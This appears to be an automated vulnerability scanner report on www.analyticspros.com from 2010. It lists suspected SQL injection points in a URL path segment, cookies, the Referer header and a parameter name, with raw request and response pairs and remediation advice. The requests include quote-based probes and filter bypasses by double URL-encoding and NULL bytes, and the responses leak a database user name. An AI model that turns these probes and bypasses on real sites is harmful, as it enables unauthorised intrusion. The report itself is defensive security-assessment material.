HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:44:57 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:45:00 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:45:00 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22044
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics%2527/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:54:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics%2527%2527/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:54:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:54:30 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:54:30 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:41:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:41:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics'/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:03:27 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics''/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:03:28 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:03:31 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:03:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26170
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:52:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:52:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:53:02 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:53:02 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26145
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.24. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html?itemid=70#comment&1%00'=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:01:52 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html?itemid=70#comment&1%00''=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:01:53 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:01:54 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:01:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/113-domain-hostname-content-reports.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:57:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/113-domain-hostname-content-reports.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:57:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:57:11 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:57:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39325
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; Referer: http://www.google.com/search?hl=en&q=%00'
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:57:38 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; Referer: http://www.google.com/search?hl=en&q=%00''
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:57:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:37:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:37:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:37:04 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:37:04 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26022
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
